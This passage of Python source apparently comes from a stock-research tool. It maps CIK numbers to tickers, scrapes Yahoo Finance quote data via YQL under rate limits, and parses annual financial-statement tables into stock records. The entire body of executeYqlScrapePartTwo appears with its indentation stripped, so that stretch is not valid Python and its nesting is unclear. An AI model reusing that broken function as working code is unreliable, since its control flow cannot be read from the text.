            stock = utils.return_stock_by_symbol(ticker_key)
            if not stock:
                # only create stocks for rows that name an exchange
                if value_dict.get("Exchange"):
                    if value_dict.get("Name"):
                        stock = db.create_new_Stock_if_it_doesnt_exist(ticker_key, firm_name=str(value_dict.get("Name")).strip())
                    else:
                        stock = db.create_new_Stock_if_it_doesnt_exist(ticker_key)
                else:
                    continue
            for subkey, subvalue in value_dict.items():
                if subvalue:
                    if subkey == "CIK":
                        # set a CIK attribute (plain int, no suffix) in addition
                        # to the suffixed "_rf" copy stored below
                        db.set_Stock_attribute(stock, "cik", int(subvalue), "", connection=True)
                    db.set_Stock_attribute(stock, subkey, subvalue, "_rf", connection=True)
    db.pack_if_necessary()
def download_and_save_cik_ticker_mappings():
    """Fetch the CIK/ticker CSV, parse it, and write the data onto stocks."""
    mapping = parse_cik_ticker_mapping(download_cik_ticker_csv_mapping())
    add_cik_data_to_stocks(mapping)
#################### Yahoo Finance Scrapers "_yf" ##############################################
def scrape_loop_for_missing_portfolio_stocks(ticker_list = None, update_regardless_of_recent_updates = False):
    """Scrape basic yql data for the queued + given tickers, rate-limited.

    At most config.SCRAPE_CHUNK_LENGTH tickers are processed per pass; the
    overflow is parked on config.SCRAPE_LOOP_QUEUE. If the previous pass
    started less than config.SCRAPE_SLEEP_TIME seconds ago, sleeps out the
    remainder of that window and retries.
    """
    # BUGFIX: mutable default argument ([]) replaced with a None sentinel
    ticker_list = [] if ticker_list is None else ticker_list
    if config.SCRAPE_LOOP_QUEUE:
        # NOTE(review): the queue is prepended but never cleared when it all
        # fits in one chunk — confirm whether that is intended.
        ticker_list = config.SCRAPE_LOOP_QUEUE + ticker_list
    if not ticker_list:
        return
    if len(ticker_list) > config.SCRAPE_CHUNK_LENGTH:
        ticker_list, overflow = ticker_list[:config.SCRAPE_CHUNK_LENGTH], ticker_list[config.SCRAPE_CHUNK_LENGTH:]
        config.SCRAPE_LOOP_QUEUE = overflow
    if (float(time.time()) - float(config.SCRAPE_SLEEP_TIME) > float(config.SCRAPE_LOOP_STARTED)):
        config.SCRAPE_LOOP_STARTED = float(time.time())
        ticker_chunk_list_triple = prepareYqlScrape(ticker_list, update_regardless_of_recent_updates = update_regardless_of_recent_updates)
        chunk_list = ticker_chunk_list_triple[0]
        for i in range(len(chunk_list)):
            data = executeYqlScrapePartOne(chunk_list, i)
            executeYqlScrapePartTwo(chunk_list, i, data)
    else:
        # BUGFIX: sleep for the time REMAINING in the rate-limit window; the
        # original slept for the time already elapsed instead.
        sleep_time_left = float(config.SCRAPE_SLEEP_TIME) - (float(time.time()) - float(config.SCRAPE_LOOP_STARTED))
        if sleep_time_left > 0:
            time.sleep(sleep_time_left)
        scrape_loop_for_missing_portfolio_stocks(ticker_list = ticker_list)
def prepareYqlScrape(ticker_list = None, update_regardless_of_recent_updates = False): # from finance.yahoo.com
    """Split the tickers to scrape into yql-sized chunks.

    When *ticker_list* is empty, all tickers from config.GLOBAL_STOCK_DICT are
    used. Tickers updated within the staleness window are skipped unless
    *update_regardless_of_recent_updates* is set.

    Returns [chunk_list, percent_of_full_scrape_done, number_of_tickers_to_scrape],
    or None when chunk_length is misconfigured (< 1).
    """
    # BUGFIX: the original default `ticker_list=[]` was appended to below, so
    # the default list accumulated tickers across calls.
    if not ticker_list: # added so you can update limited tickers
        ticker_list = [t for t in config.GLOBAL_STOCK_DICT if config.GLOBAL_STOCK_DICT.get(t)]
    # 145 appears to be the longest url string i can query with, but 50 seems more stable
    chunk_length = config.SCRAPE_CHUNK_LENGTH
    # Skip stocks that were already recently updated (important to prevent
    # overscraping yahoo); unknown tickers are scraped under their raw symbol.
    yql_ticker_list = []
    for ticker in sorted(ticker_list):
        stock = utils.return_stock_by_symbol(ticker) # later stages use yql-specific symbols
        if stock:
            time_since_update = float(time.time()) - stock.last_yql_basic_scrape_update
            if (int(time_since_update) < int(config.TIME_ALLOWED_FOR_BEFORE_RECENT_UPDATE_IS_STALE)) and not update_regardless_of_recent_updates:
                logging.warning("Will not add %s to update list, updated too recently, waste of yql query" % str(stock.symbol))
                continue
            yql_ticker_list.append(stock.yql_ticker)
        else:
            logging.info("Something is off with a stock, it's not returning properly")
            yql_ticker_list.append(ticker)
    num_of_tickers = len(yql_ticker_list)
    # rate-limit context: yql allows roughly 200 calls/hour, i.e. one query
    # every ~18 seconds (3600 / 200); the sleep happens in the execute stage
    if chunk_length < 1:
        logging.error("chunk_length too small, will create infinite loop")
        return
    # slice the ticker list into chunks; the final chunk is shorter
    chunk_list = []
    slice_start = 0
    slice_end = chunk_length
    count = 0
    while slice_end < (num_of_tickers + chunk_length):
        if slice_end > num_of_tickers:
            slice_end = num_of_tickers
        logging.info('While loop #%d' % count)
        chunk_list.append(yql_ticker_list[slice_start:slice_end])
        count += 1
        slice_start += chunk_length
        slice_end += chunk_length
    number_of_tickers_in_chunk_list = sum(len(chunk) for chunk in chunk_list)
    logging.info("Number of tickers to scrape: {}".format(number_of_tickers_in_chunk_list))
    number_of_tickers_previously_updated = len(ticker_list) - number_of_tickers_in_chunk_list
    logging.info(number_of_tickers_previously_updated)
    total_number_of_tickers_done = number_of_tickers_previously_updated
    # BUGFIX: guard the percentage against ZeroDivisionError when both the
    # argument and config.GLOBAL_STOCK_DICT are empty
    if ticker_list:
        percent_of_full_scrape_done = round(100 * float(total_number_of_tickers_done) / float(len(ticker_list)) )
    else:
        percent_of_full_scrape_done = 100
    logging.info(str(percent_of_full_scrape_done) + "%%" +" already done")
    return [chunk_list, percent_of_full_scrape_done, number_of_tickers_in_chunk_list]
def executeYqlScrapePartOne(ticker_chunk_list, position_of_this_chunk):
    """Scrape Yahoo quote data for one ticker chunk.

    Returns the pyql quote data, or None when the chunk is empty or the
    scrape fails.
    """
    sleep_time = config.SCRAPE_SLEEP_TIME
    ticker_chunk = ticker_chunk_list[position_of_this_chunk]
    logging.info(ticker_chunk)
    if not ticker_chunk:
        return
    try:
        data = pyql.lookupQuote(ticker_chunk)
    except:
        logging.warning("Scrape didn't work. Nothing scraped.")
        return
    logging.info("Scrape 1 Success: mid-scrape sleep for %d seconds" % sleep_time)
    return data
def executeYqlScrapePartTwo(ticker_chunk_list, position_of_this_chunk, successful_pyql_data): # This is the big one
sleep_time = config.SCRAPE_SLEEP_TIME
ticker_chunk = ticker_chunk_list[position_of_this_chunk]
number_of_stocks_in_this_scrape = len(ticker_chunk)
data = successful_pyql_data
try:
data2 = pyql.lookupKeyStats(ticker_chunk)
except:
logging.warning("Scrape 2 didn't work. Abort.")
time.sleep(sleep_time)
return
for stock in data:
new_stock = None
for key, value in stock.items():
if key == "symbol":
new_stock = utils.return_stock_by_yql_symbol(value) # must use yql return here for ticker that include a "^" or "/", a format yahoo finance does not use.
if not new_stock:
# this should not, ever, happen:
logging.error("New Stock should not need to be created here, but we are going to create it anyway, there is a problem with the yql ticker %s" % value)
new_stock = db.create_new_Stock_if_it_doesnt_exist(value)
else:
new_stock.updated = datetime.datetime.now()
new_stock.epoch = float(time.time())
for key, value in stock.items():
# Here we hijack the power of the python object structure
# This adds the attribute of every possible attribute that can be passed
if key == "symbol":
continue # already have this, don't need it again, in fact, the yql symbol is different for many terms
db.set_Stock_attribute(new_stock, str(key), value, "_yf")
logging.info("Success, saving %s: Data 1 (Yahoo Quote)" % new_stock.yql_ticker)
#save
db.save_GLOBAL_STOCK_DICT()
for stock2 in data2:
for key, value in stock2.items():
if key == "symbol":
new_stock = utils.return_stock_by_yql_symbol(value)
if not new_stock:
# this should not, ever, happen:
logging.error("New Stock should not need to be created here, but we are going to create it anyway, there is a problem with the yql ticker %s" % value)
new_stock = db.create_new_Stock_if_it_doesnt_exist(value)
for key, value in stock2.items():
if key == "symbol":
continue # already have this, don't need it again, in fact, the yql symbol is different for many terms
if isinstance(value, (list, dict)):
#logging.warning(type(value))
x = repr(value)
term = None
content = None
#logging.warning(x)
if x[0] == "[":
y = ast.literal_eval(x)
#logging.warning(y)
for i in y:
try:
test = i["term"]
test = i["content"]
except Exception as e:
#logging.error(new_stock.symbol)
#logging.error(y)
#logging.error("Seems to be [Trailing Annual Dividend Yield, Trailing Annual Dividend Yield%]")
continue
#logging.warning(i)
try:
key_str = str(key)
date = None
date_str = None
term = str(i["term"])
term = term.replace(" ", "_")
term = term.replace(",", "")
term = utils.strip_string_whitespace(term)
key_term = key_str + "_" + term
key_term = utils.strip_string_whitespace(key_term)
if "p_52_WeekHigh" in key_term:
date = key_term[14:]
date_str = "p_52_WeekHigh_Date"
key_str = "p_52_WeekHigh"
elif "p_52_WeekLow" in key_term:
date = key_term[13:]
date_str = "p_52_WeekLow_Date"
key_str = "p_52_WeekLow"
elif "ForwardPE_fye" in key_term:
date = key_term[14:]
date_str = "ForwardPE_fiscal_y_end_Date"
key_str = "ForwardPE"
elif "EnterpriseValue_" in key_term:
date = key_term[16:]
date_str = "EnterpriseValue_Date"
key_str = "EnterpriseValue"
elif "TrailingPE_ttm_" in key_term:
date = key_term[15:] # will be of form TrailingPE_ttm__intraday
date_str = "TrailingPE_ttm_Date"
key_str = "TrailingPE_ttm"
elif "SharesShort_as_of" in key_term:
date = key_term[18:] # will be of form SharesShort_as_of_Jul_15__2013
date_str = "SharesShort_as_of_Date"
key_str = "SharesShort"
elif "ShortRatio_as_of" in key_term:
date = key_term[16:] # will be of form SharesShort_as_of_Jul_15__2013
date_str = "ShortRatio_as_of_Date"
key_str = "ShortRatio"
elif "ShortPercentageofFloat_as_of" in key_term:
date = key_term[29:]
date_str = "ShortPercentageofFloat_as_of_Date"
key_str = "ShortPercentageofFloat"
else:
date = None
date_str = None
key_str = str(key + "_" + term)
content = str(i["content"])
db.set_Stock_attribute(new_stock, key_str, content, "_yf")
if date_str:
db.set_Stock_attribute(new_stock, date_str, date, "_yf")
except Exception as e:
line_number()
logging.warning(repr(i))
logging.warning("complex list method did not work")
logging.exception(e)
db.set_Stock_attribute(new_stock, str(key), x, "_yf")
elif x[0] == "{":
y = ast.literal_eval(x)
try:
test = y["term"]
test = y["content"]
except Exception as e:
#logging.error(new_stock.symbol)
#logging.error(y)
#logging.error("Seems to be [Trailing Annual Dividend Yield, Trailing Annual Dividend Yield%]")
continue
#logging.warning(y)
try:
key_str = str(key)
date = None
date_str = None
term = str(y["term"])
term = term.replace(" ", "_")
term = term.replace(",", "")
term = utils.strip_string_whitespace(term)
key_term = key_str + "_" + term
key_term = utils.strip_string_whitespace(key_term)
if "p_52_WeekHigh" in key_term:
date = key_term[14:]
date_str = "p_52_WeekHigh_Date"
key_str = "p_52_WeekHigh"
elif "p_52_WeekLow" in key_term:
date = key_term[13:]
date_str = "p_52_WeekLow_Date"
key_str = "p_52_WeekLow"
elif "ForwardPE_fye" in key_term:
date = key_term[14:]
date_str = "ForwardPE_fiscal_y_end_Date"
key_str = "ForwardPE"
elif "EnterpriseValue_" in key_term:
date = key_term[16:]
date_str = "EnterpriseValue_Date"
key_str = "EnterpriseValue"
elif "TrailingPE_ttm_" in key_term:
date = key_term[15:] # will be of form TrailingPE_ttm__intraday
date_str = "TrailingPE_ttm_Date"
key_str = "TrailingPE_ttm"
elif "SharesShort_as_of" in key_term:
date = key_term[18:] # will be of form SharesShort_as_of_Jul_15__2013
date_str = "SharesShort_as_of_Date"
key_str = "SharesShort"
elif "ShortRatio_as_of" in key_term:
date = key_term[16:] # will be of form SharesShort_as_of_Jul_15__2013
date_str = "ShortRatio_as_of_Date"
key_str = "ShortRatio"
elif "ShortPercentageofFloat_as_of" in key_term:
date = key_term[29:]
date_str = "ShortPercentageofFloat_as_of_Date"
key_str = "ShortPercentageofFloat"
else:
key_str = str(key + "_" + term)
content = str(y["content"])
db.set_Stock_attribute(new_stock, key_str, content, "_yf")
if date_str:
db.set_Stock_attribute(new_stock, date_str, date, "_yf")
except Exception as e:
logging.warning("complex dict method did not work")
logging.exception(e)
db.set_Stock_attribute(new_stock, str(key), x, "_yf")
else:
key_str = str(key)
db.set_Stock_attribute(new_stock, key_str, x, "_yf")
else:
key_str = str(key)
db.set_Stock_attribute(new_stock, key_str, value, "_yf")
new_stock.last_yql_basic_scrape_update = float(time.time())
logging.info("Success, saving %s: Data 2 (Yahoo Key Statistics)" % new_stock.yql_ticker)
#save again
db.save_GLOBAL_STOCK_DICT()
logging.info("This stock chunk finished successfully.")
#self.progress_bar.SetValue((float(slice_end)/float(num_of_tickers)) * 100)
#app.Yield()
def yqlQuickStockQuoteScrape(ticker_list): # len < 50
    """Scrape quick quote data for up to 50 tickers via YQL and store it.

    For each returned quote dict, looks up (or, as a last resort, creates)
    the Stock object by its YQL symbol, stamps it with the current time,
    and copies every key/value pair onto the object via
    db.set_Stock_attribute with the "_yf" suffix.

    Parameters
    ----------
    ticker_list : list of str
        Ticker symbols; must contain 50 or fewer entries.

    Returns
    -------
    list or None
        The raw quote data on success, None when nothing was scraped.

    BUGFIX: the original returned `data` immediately on success, so the
    processing loop below was dead code; and when the scrape failed
    (`data is None`) it fell through into `for stock in data:` and raised
    TypeError. Now: bail out early on failure, otherwise process then return.
    """
    if len(ticker_list) > 50:
        logging.warning("too many tickers to scrape, using this method, please do a full scrape")
        return
    data = None
    try:
        data = pyql.lookupQuote(ticker_list)
    except Exception:  # narrowed from bare except; pyql failures are best-effort
        logging.warning("Scrape didn't work. Nothing scraped.")
    if not data:
        return None
    logging.info("Scrape Success")
    for stock in data:
        new_stock = None
        for key, value in stock.items():
            if key == "symbol":
                # must use yql return here for tickers that include a "^" or "/",
                # a format yahoo finance does not use.
                new_stock = utils.return_stock_by_yql_symbol(value)
                if not new_stock:
                    # this should not, ever, happen:
                    logging.error("New Stock should not need to be created here, but we are going to create it anyway, there is a problem with the yql ticker %s" % value)
                    new_stock = db.create_new_Stock_if_it_doesnt_exist(value)
                else:
                    new_stock.updated = datetime.datetime.now()
                    new_stock.epoch = float(time.time())
        for key, value in stock.items():
            # Here we hijack the power of the python object structure:
            # every key in the quote becomes an attribute on the Stock.
            if key == "symbol":
                continue # already stored; the yql symbol differs for many terms
            db.set_Stock_attribute(new_stock, str(key), value, "_yf")
        logging.info("Success, saving %s: Data (Yahoo Quote)" % new_stock.yql_ticker)
    db.save_GLOBAL_STOCK_DICT()
    return data
# Stock Annual Data Scraping Functions
# ---- unfortunately after scraping many stocks, these scraping functions need to be overhauled
# ---- it seems that the data that is returned is not formatted properly for firms that are < 4 years old
# ---- I'll need to account for this disparity and rewrite the scrape functions with more precision.
## --- Much has been improved, but I still need to re-write it for single-year data.
def yf_annual_cash_flow_scrape(ticker):
    """Scrape the Yahoo Finance annual cash-flow page for `ticker`.

    Skips the scrape when the stored data is still fresh (per
    config.TIME_ALLOWED_FOR_BEFORE_RECENT_UPDATE_IS_STALE), otherwise pulls
    the yfnc_tabledata1 table, flattens its <td>/<strong> cells into a list,
    and hands the list to create_or_update_yf_StockAnnualData.

    BUGFIX: added `return` after the missing-stock error; previously the
    function continued and crashed on `None.last_cash_flow_update_yf`.
    """
    logging.info("Starting: yf_annual_cash_flow_scrape for %s" % ticker)
    stock = utils.return_stock_by_symbol(ticker)
    if not stock:
        logging.error("Error: stock %s does not exist" % ticker)
        return
    most_recent_update = stock.last_cash_flow_update_yf
    last_acceptable_update = float(time.time()) - config.TIME_ALLOWED_FOR_BEFORE_RECENT_UPDATE_IS_STALE
    if most_recent_update > last_acceptable_update:
        logging.info("YF Cash flow data for %s is up to date." % ticker)
        return
    soup = BeautifulSoup(urlopen('http://finance.yahoo.com/q/cf?s=%s&annual' % ticker), "html.parser")
    # All figures on the page are quoted in thousands; factor scales them up.
    factor = 0
    thousands = soup.body.findAll(text= "All numbers in thousands")
    if thousands:
        factor = 1000
    if not factor:
        logging.error("Error: no factor... in need of review")
    table = soup.find("table", { "class" : "yfnc_tabledata1" })
    data_list = []
    find_all_data_in_table(table, "td", data_list, factor)
    find_all_data_in_table(table, "strong", data_list, factor)
    create_or_update_yf_StockAnnualData(ticker, data_list, "Cash_Flow")

# Reference map of the flattened cash-flow table: position -> field name
# ("-" marks value slots). Used to derive cash_flow_data_positions in
# create_or_update_yf_StockAnnualData; kept as inert documentation.
cash_flow_layout = ['''
    0 Period Ending
    1 Period Ending
    2 -
    3 -
    4 -
    5 Operating Activities, Cash Flows Provided By or Used In
    6 Depreciation
    7 -
    8 -
    9 -
    10 Adjustments To Net Income
    11 -
    12 -
    13 -
    14 Changes In Accounts Receivables
    15 -
    16 -
    17 -
    18 Changes In Liabilities
    19 -
    20 -
    21 -
    22 Changes In Inventories
    23 -
    24 -
    25 -
    26 Changes In Other Operating Activities
    27 -
    28 -
    29 -
    30 Investing Activities, Cash Flows Provided By or Used In
    31 Capital Expenditures
    32 -
    33 -
    34 -
    35 Investments
    36 -
    37 -
    38 -
    39 Other Cash flows from Investing Activities
    40 -
    41 -
    42 -
    43 Financing Activities, Cash Flows Provided By or Used In
    44 Dividends Paid
    45 -
    46 -
    47 -
    48 Sale Purchase of Stock
    49 -
    50 -
    51 -
    52 Net Borrowings
    53 -
    54 -
    55 -
    56 Other Cash Flows from Financing Activities
    57 -
    58 -
    59 -
    60 Effect Of Exchange Rate Changes
    61 -
    62 -
    63 -
    64 Net Income
    65 -
    66 -
    67 -
    68 Operating Activities, Cash Flows Provided By or Used In
    69 Total Cash Flow From Operating Activities
    70 -
    71 -
    72 -
    73 Investing Activities, Cash Flows Provided By or Used In
    74 Total Cash Flows From Investing Activities
    75 -
    76 -
    77 -
    78 Financing Activities, Cash Flows Provided By or Used In
    79 Total Cash Flows From Financing Activities
    80 -
    81 -
    82 -
    83 Change In Cash and Cash Equivalents
    84 -
    85 -
    86 -
    ''']
def yf_annual_income_statement_scrape(ticker):
    """Scrape the Yahoo Finance annual income-statement page for `ticker`.

    Mirrors yf_annual_cash_flow_scrape: freshness check, fetch, flatten the
    yfnc_tabledata1 table and forward it to create_or_update_yf_StockAnnualData.

    BUGFIX: added `return` after the missing-stock error; previously the
    function continued and crashed on `None.last_income_statement_update_yf`.
    Also added the no-factor error log for consistency with the cash-flow twin.
    """
    logging.info("Starting: yf_annual_income_statement_scrape for %s" % ticker)
    stock = utils.return_stock_by_symbol(ticker)
    if not stock:
        logging.error("Error: stock %s does not exist" % ticker)
        return
    most_recent_update = stock.last_income_statement_update_yf
    last_acceptable_update = float(time.time()) - config.TIME_ALLOWED_FOR_BEFORE_RECENT_UPDATE_IS_STALE
    if most_recent_update > last_acceptable_update:
        logging.info("YF income statement data for %s is up to date." % ticker)
        return
    soup = BeautifulSoup(urlopen('http://finance.yahoo.com/q/is?s=%s&annual' % ticker), "html.parser")
    # All figures on the page are quoted in thousands; factor scales them up.
    factor = 0
    thousands = soup.body.findAll(text= "All numbers in thousands")
    if thousands:
        factor = 1000
    if not factor:
        logging.error("Error: no factor... in need of review")
    table = soup.find("table", { "class" : "yfnc_tabledata1" })
    data_list = []
    find_all_data_in_table(table, "td", data_list, factor)
    find_all_data_in_table(table, "strong", data_list, factor)
    create_or_update_yf_StockAnnualData(ticker, data_list, "Income_Statement")

# Reference map of the flattened income-statement table: position -> field
# name ("-" marks value slots). Source of income_statement_data_postitions
# in create_or_update_yf_StockAnnualData; kept as inert documentation.
income_statment_layout = ['''
    0 Period Ending
    1 Period Ending
    2 Cost of Revenue
    3 -
    4 -
    5 -
    6 Operating Expenses
    7 Research Development
    8 -
    9 -
    10 -
    11 Selling General and Administrative
    12 -
    13 -
    14 -
    15 Non Recurring
    16 -
    17 -
    18 -
    19 Others
    20 -
    21 -
    22 -
    23 Total Operating Expenses
    24 -
    25 -
    26 -
    27 Income from Continuing Operations
    28 Total Other Income/Expenses Net
    29 -
    30 -
    31 -
    32 Earnings Before Interest And Taxes
    33 -
    34 -
    35 -
    36 Interest Expense
    37 -
    38 -
    39 -
    40 Income Before Tax
    41 -
    42 -
    43 -
    44 Income Tax Expense
    45 -
    46 -
    47 -
    48 Minority Interest
    49 -
    50 -
    51 -
    52 Net Income From Continuing Ops
    53 -
    54 -
    55 -
    56 Non-recurring Events
    57 Discontinued Operations
    58 -
    59 -
    60 -
    61 Extraordinary Items
    62 -
    63 -
    64 -
    65 Effect Of Accounting Changes
    66 -
    67 -
    68 -
    69 Other Items
    70 -
    71 -
    72 -
    73 Preferred Stock And Other Adjustments
    74 -
    75 -
    76 -
    77 Total Revenue
    78 -
    79 -
    80 -
    81 Gross Profit
    82 -
    83 -
    84 -
    85 Operating Income or Loss
    86 -
    87 -
    88 -
    89 Net Income
    90 -
    91 -
    92 -
    93 Net Income Applicable To Common Shares
    94 -
    95 -
    96 -
    ''']
def yf_annual_balance_sheet_scrape(ticker):
    """Scrape the Yahoo Finance annual balance-sheet page for `ticker`.

    Mirrors yf_annual_cash_flow_scrape: freshness check, fetch, flatten the
    yfnc_tabledata1 table and forward it to create_or_update_yf_StockAnnualData.

    BUGFIX: added `return` after the missing-stock error; previously the
    function continued and crashed on `None.last_balance_sheet_update_yf`.
    Also added the no-factor error log for consistency with the cash-flow twin.
    """
    logging.info("Starting: yf_annual_balance_sheet_scrape for %s" % ticker)
    stock = utils.return_stock_by_symbol(ticker)
    if not stock:
        logging.error("Error: stock %s does not exist" % ticker)
        return
    most_recent_update = stock.last_balance_sheet_update_yf
    last_acceptable_update = float(time.time()) - config.TIME_ALLOWED_FOR_BEFORE_RECENT_UPDATE_IS_STALE
    if most_recent_update > last_acceptable_update:
        logging.info("YF balance sheet data for %s is up to date." % ticker)
        return
    soup = BeautifulSoup(urlopen('http://finance.yahoo.com/q/bs?s=%s&annual' % ticker), "html.parser")
    # All figures on the page are quoted in thousands; factor scales them up.
    factor = 0
    thousands = soup.body.findAll(text= "All numbers in thousands")
    if thousands:
        factor = 1000
    if not factor:
        logging.error("Error: no factor... in need of review")
    table = soup.find("table", { "class" : "yfnc_tabledata1" })
    data_list = []
    find_all_data_in_table(table, "td", data_list, factor)
    find_all_data_in_table(table, "strong", data_list, factor)
    create_or_update_yf_StockAnnualData(ticker, data_list, "Balance_Sheet")

# Reference map of the flattened balance-sheet table (captured with real
# sample values rather than "-" placeholders in every slot). Source of
# balance_sheet_data_positions in create_or_update_yf_StockAnnualData;
# kept as inert documentation.
balance_sheet_layout = ['''
    0 Period Ending
    1 Period Ending
    2 Mar 31 2013
    3 Mar 31 2012
    4 Mar 31 2011
    5 Assets
    6 Current Assets
    7 Cash And Cash Equivalents
    8 4059000000
    9 4047000000
    10 3767000000
    11 Short Term Investments
    12 320000000
    13 74000000
    14 32000000
    15 Net Receivables
    16 1754000000
    17 1524000000
    18 1322000000
    19 Inventory
    20 -
    21 -
    22 -
    23 Other Current Assets
    24 391000000
    25 300000000
    26 206000000
    27 Long Term Investments
    28 72000000
    29 2000000
    30 5000000
    31 Property Plant and Equipment
    32 1191000000
    33 1063000000
    34 1086000000
    35 Goodwill
    36 364000000
    37 195000000
    38 185000000
    39 Intangible Assets
    40 68000000
    41 34000000
    42 11000000
    43 Accumulated Amortization
    44 -
    45 -
    46 -
    47 Other Assets
    48 245000000
    49 236000000
    50 326000000
    51 Deferred Long Term Asset Charges
    52 94000000
    53 62000000
    54 85000000
    55 Liabilities
    56 Current Liabilities
    57 Accounts Payable
    58 393000000
    59 310000000
    60 224000000
    61 Short/Current Long Term Debt
    62 -
    63 9000000
    64 -
    65 Other Current Liabilities
    66 765000000
    67 618000000
    68 592000000
    69 Long Term Debt
    70 -
    71 -
    72 -
    73 Other Liabilities
    74 27000000
    75 22000000
    76 72000000
    77 Deferred Long Term Liability Charges
    78 23000000
    79 2000000
    80 -
    81 Minority Interest
    82 -
    83 -
    84 -
    85 Negative Goodwill
    86 -
    87 -
    88 -
    89 Stockholders' Equity
    90 Misc Stocks Options Warrants
    91 -
    92 -
    93 -
    94 Redeemable Preferred Stock
    95 -
    96 -
    97 -
    98 Preferred Stock
    99 -
    100 -
    101 -
    102 Common Stock
    103 64000000
    104 64000000
    105 64000000
    106 Retained Earnings
    107 7666000000
    108 6509000000
    109 5294000000
    110 Treasury Stock
    111 -
    112 -
    113 -
    114 Capital Surplus
    115 -
    116 -
    117 -
    118 Other Stockholder Equity
    119 -399000000
    120 3000000
    121 764000000
    122 Assets
    123 Total Current Assets
    124 6505000000
    125 5945000000
    126 5312000000
    127 Total Assets
    128 8539000000
    129 7537000000
    130 7010000000
    131 Liabilities
    132 Total Current Liabilities
    133 1158000000
    134 937000000
    135 816000000
    136 Total Liabilities
    137 1208000000
    138 961000000
    139 888000000
    140 Stockholders' Equity
    141 Total Stockholder Equity
    142 -
    143 -
    144 -
    145 Net Tangible Assets
    146 -
    147 -
    148 -
    ''']
def find_all_data_in_table(table, str_to_find, data_list_to_append_to, table_factor=1):
    """Append cleaned cell text from a BeautifulSoup table to a list, in place.

    Each matching tag's first text node is whitespace-stripped, has
    non-breaking spaces and commas removed, parenthesised values converted
    to negatives, and numeric values scaled by `table_factor`. Non-empty
    results are appended to `data_list_to_append_to` as strings.
    """
    if not table:
        logging.error("No table when looking for {}".format(str_to_find))
        return
    for tag in table.findAll(str_to_find):
        raw = tag.find(text=True)
        if not raw:
            continue
        # Normalise: strip whitespace, swap nbsp for a space, drop commas.
        cleaned = utils.strip_string_whitespace(raw)
        cleaned = str(cleaned.replace(u'\xa0', u' ')).replace(',', "")
        if cleaned:
            if cleaned[0] == "(":
                # Accounting notation: "(123)" means -123.
                chars = list(cleaned)
                chars[0] = "-"
                chars[-1] = ""
                cleaned = "".join(chars)
            if utils.is_number(cleaned):
                scaled = float(cleaned) * table_factor
                # Keep the decimal form only when it carries information.
                cleaned = str(scaled) if utils.relevant_float(scaled) else str(int(scaled))
        if cleaned:
            data_list_to_append_to.append(str(cleaned))
def create_or_update_yf_StockAnnualData(ticker, data_list, data_type):
    """Store a flattened Yahoo annual-statement list onto the Stock object.

    `data_list` is the flat cell list produced by find_all_data_in_table;
    `data_type` is one of "Cash_Flow", "Balance_Sheet", "Income_Statement".
    Field names live at known positions (see the *_layout reference lists);
    the following `default_amount_of_data` entries are the yearly values.
    When Yahoo only returns two years of history the list is shorter and
    every position is shifted back by one per preceding section, which the
    adjustment loops below compensate for.

    BUGFIX: added `return` after the missing-stock error; previously the
    function continued and crashed on `stock.last_*_update_yf = ...`.
    """
    logging.info("--------------")
    logging.info(data_type)
    logging.info(len(data_list))
    stock = utils.return_stock_by_symbol(ticker)
    if not stock:
        logging.error("error in create_or_update_yf_StockAnnualData")
        return
    default_amount_of_data = 3
    cash_flow_data_positions = [1,6,10,14,18,22,26,31,35,39,44,48,52,56,60,64,69,74,79,83]
    income_statement_data_postitions = [2,7,11,15,19,23,28,32,36,40,44,48,52,57,61,65,69,73,77,81,85,89,93]
    balance_sheet_data_positions = [1,7,11,15,19,23,27,31,35,39,43,47,51,57,61,65,69,73,77,81,85,90,94,98,102,106,110,114,118,123,127,132,136,141,145]
    # If only two units of data appear per section, every field position
    # shifts back by one per preceding section; the running
    # adjustment_variable applies that compounding correction.
    if data_type == "Balance_Sheet" and len(data_list) == 117:
        logging.info("adjusting for 2 years worth of Balance_Sheet data")
        default_amount_of_data = 2
        adjusted_balance_sheet_data_positions = []
        adjustment_variable = 0
        for i in balance_sheet_data_positions:
            adjusted_balance_sheet_data_positions.append(i - adjustment_variable)
            adjustment_variable += 1
        balance_sheet_data_positions = adjusted_balance_sheet_data_positions
    elif data_type == "Income_Statement" and len(data_list) == 74:
        logging.info("adjusting for 2 years worth of Income_Statement data")
        default_amount_of_data = 2
        adjusted_income_statement_data_positions = []
        adjustment_variable = 0
        for i in income_statement_data_postitions:
            adjusted_income_statement_data_positions.append(i - adjustment_variable)
            adjustment_variable += 1
        income_statement_data_postitions = adjusted_income_statement_data_positions
    elif data_type == "Cash_Flow" and len(data_list) == 67:
        logging.info("adjusting for 2 years worth of Cash_Flow data")
        default_amount_of_data = 2
        adjusted_cash_flow_data_positions = []
        adjustment_variable = 0
        for i in cash_flow_data_positions:
            adjusted_cash_flow_data_positions.append(i - adjustment_variable)
            adjustment_variable += 1
        cash_flow_data_positions = adjusted_cash_flow_data_positions
    data_positions = []
    if data_type == "Cash_Flow":
        data_positions = cash_flow_data_positions
        stock.last_cash_flow_update_yf = float(time.time())
    elif data_type == "Balance_Sheet":
        for i in data_list:
            logging.info(i)
        data_positions = balance_sheet_data_positions
        stock.last_balance_sheet_update_yf = float(time.time())
    elif data_type == "Income_Statement":
        data_positions = income_statement_data_postitions
        stock.last_income_statement_update_yf = float(time.time())
    else:
        logging.warning("no data type selected")
        return
    # First pass: record the reporting periods (last 4 chars = year).
    for i in range(len(data_list)):
        if i in data_positions:
            attribute = str(data_list[i])
            attribute = attribute.replace(" ","_")
            attribute = attribute.replace("/","_")
            attribute = attribute.replace("'","")
            if attribute == "Period_Ending":
                for j in range(default_amount_of_data):
                    data = data_list[i+j+1]
                    data = data[-4:]
                    # Lazily create the period list on first use
                    # (was try/bare-except; hasattr is equivalent here).
                    if not hasattr(stock, "annual_data_periods_yf"):
                        stock.annual_data_periods_yf = ["" for _ in range(default_amount_of_data)]
                    stock.annual_data_periods_yf[j] = data
    # Second pass: store each field's yearly values as suffixed attributes.
    for i in range(len(data_list)):
        if i in data_positions:
            attribute = str(data_list[i])
            attribute = attribute.replace(" ","_")
            attribute = attribute.replace("/","_")
            attribute = attribute.replace("'","")
            if attribute == "Period_Ending":
                # Disambiguate: each statement type has its own period row.
                attribute = attribute + "_For_" + data_type
            attribute_data_list = []
            for j in range(default_amount_of_data):
                data = data_list[i+j+1]
                data = data.replace(",","")
                attribute_data_list.append(data)
            for k in range(default_amount_of_data):
                # Suffixes: current year "", trailing 1 year, trailing 2 years.
                year_list = ["", "_t1y", "_t2y"]
                year = year_list[k]
                db.set_Stock_attribute(stock, attribute + year, attribute_data_list[k], "_yf")
    db.save_GLOBAL_STOCK_DICT()
